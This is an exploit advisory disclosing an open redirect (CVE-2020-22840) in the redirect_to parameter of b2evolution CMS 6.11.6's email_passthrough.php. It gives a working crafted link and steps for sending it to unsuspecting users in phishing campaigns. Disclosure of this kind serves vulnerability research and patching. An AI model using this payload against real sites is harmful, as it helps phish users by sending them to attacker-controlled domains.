# Exploit Title: *Open redirect in b2evolution CMS 6.11.6 redirect_to
parameter in email_passthrough.php*
# Google Dork: N/A
# Date: 10/02/2021
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://b2evolution.net/
# Software Link:
https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux
# CVE : *CVE-2020-22840*

Vulnerable File:
--------------------------
http://host/htsrv/email_passthrough.php <http://host/evoadm.php>

Vulnerable Issue:
--------------------------
redirect_to parameter has no input validation/domain whitelisting.

--------------------------Proof of Concept-----------------------
Steps to Reproduce:

1. Send the following link :
*http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com
<http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com>*
to
the unsuspecting user
2. The user will be redirected to Google.com or any other attacker
controlled domain
3. This can be used to perform malicious phishing campaigns on unsuspecting
users